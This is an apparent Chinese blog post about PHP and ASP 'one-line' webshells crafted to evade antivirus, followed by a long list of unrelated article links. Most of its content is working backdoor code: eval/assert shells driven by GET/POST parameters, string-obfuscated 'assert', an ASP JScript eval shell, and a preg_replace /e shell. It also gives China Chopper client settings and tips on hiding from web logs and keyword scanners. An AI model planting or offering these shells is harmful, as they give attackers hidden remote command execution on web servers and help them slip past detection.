当前位置: 首页 > news >正文

php一句话免杀

by Tm3yShell7

<?php $_GET['ts7']($_POST['cmd']);?>

客户端用菜刀,密码cmd,url为test.php?ts7=assert

这个应该算没有什么特征码了,但是缺点就是在web日志中会暴露出来assert

可以都用post:

<?php $_POST['ts7']($_POST['cmd']);?>

在菜刀说明用<O>ts7=assert</O>post附加数据.

这中间考虑了这些:

<?php
$ts7 = (string)key($_POST);
$ts7($_POST[’assert']);
?>

猛然发现assert这个关键词又出现了。。
既然字符串可以直接这样用,那还可以这样:

<?php
$a = “a”.”s”.”s”.”e”.”r”.”t”;
$a($_POST["cmd"]);
?>

或者用$a = str_replace(x,”",”axsxxsxexrxxt”)

以上说来,感觉<?php $_POST['ts7']($_POST['cmd']);?>算是最难查到的一种了。

==========================

ywisax 在论坛上又发了这个:
不知是谁写的 百度了一堆 都没写出处,貌似是lcx写的:

asp版的,这是utf-8编码,自己看着弄吧

<%@LANGUAGE=”JAVASCRIPT” CODEPAGE=”65001″%> 

<% 

var lcx = {‘名字’ : Request.form(‘#’), ‘性别’ : eval, ‘年龄’ : ‘18′, ‘昵称’ : ‘请叫我一声老大’}; 

lcx.性别((lcx.名字)+”); 

%> 

用冰狐就行了

<?php 

@preg_replace(“/[email]/e”,$_POST['h'],”error”); 

?> 

菜刀附加数据:
<O>h=@eval($_POST[c]);</O>

[email]和error你看着换吧,怎么隐蔽怎么来
密码c

相关文章:

  • 初学PHP的18个基础例程
  • PHP 函式索引 967 个函式
  • [转:IBM]编写安全PHP应用程序的七个习惯
  • 让你不再恐惧--轻松接触 PHP
  • 学习PHP必备的函数集
  • 深入剖析PHP变量的具体使用方法
  • 学习PHP动态网页技术收集的几个有用函数
  • 一分钟破解WPA/WPA2
  • [转]dedeCMS SEO实战
  • 域环境下的渗透
  • 分享几个超级不错的流量操作方法
  • 网站优化应该从哪里开始?
  • 如何修改VirtualBox下的Ubuntu的分辨率
  • PHP操作MYSQL函数手册大全
  • mysql命令集
  • Flex布局到底解决了什么问题
  • iOS小技巧之UIImagePickerController实现头像选择
  • Iterator 和 for...of 循环
  • JavaScript HTML DOM
  • magento2项目上线注意事项
  • OSS Web直传 (文件图片)
  • windows下如何用phpstorm同步测试服务器
  • 基于Javascript, Springboot的管理系统报表查询页面代码设计
  • 人脸识别最新开发经验demo
  • 使用 Docker 部署 Spring Boot项目
  • 使用agvtool更改app version/build
  • 腾讯视频格式如何转换成mp4 将下载的qlv文件转换成mp4的方法
  • 通过npm或yarn自动生成vue组件
  • 一份游戏开发学习路线
  • 原生Ajax
  • HanLP分词命名实体提取详解
  • 从如何停掉 Promise 链说起
  • 曜石科技宣布获得千万级天使轮投资,全方面布局电竞产业链 ...
  • #Linux杂记--将Python3的源码编译为.so文件方法与Linux环境下的交叉编译方法
  • #LLM入门|Prompt#1.8_聊天机器人_Chatbot
  • (42)STM32——LCD显示屏实验笔记
  • (C#)一个最简单的链表类
  • (附源码)ssm高校社团管理系统 毕业设计 234162
  • (附源码)计算机毕业设计SSM疫情下的学生出入管理系统
  • (心得)获取一个数二进制序列中所有的偶数位和奇数位, 分别输出二进制序列。
  • * CIL library *(* CIL module *) : error LNK2005: _DllMain@12 already defined in mfcs120u.lib(dllmodu
  • * 论文笔记 【Wide Deep Learning for Recommender Systems】
  • .net core webapi Startup 注入ConfigurePrimaryHttpMessageHandler
  • .Net FrameWork总结
  • .NET/C# 项目如何优雅地设置条件编译符号?
  • .NET/C# 在 64 位进程中读取 32 位进程重定向后的注册表
  • @Controller和@RestController的区别?
  • @SuppressLint(NewApi)和@TargetApi()的区别
  • @取消转义
  • @在php中起什么作用?
  • [ Algorithm ] N次方算法 N Square 动态规划解决
  • [ vulhub漏洞复现篇 ] struts2远程代码执行漏洞 S2-005 (CVE-2010-1870)
  • [].slice.call()将类数组转化为真正的数组
  • [04]Web前端进阶—JS伪数组
  • [1]-基于图搜索的路径规划基础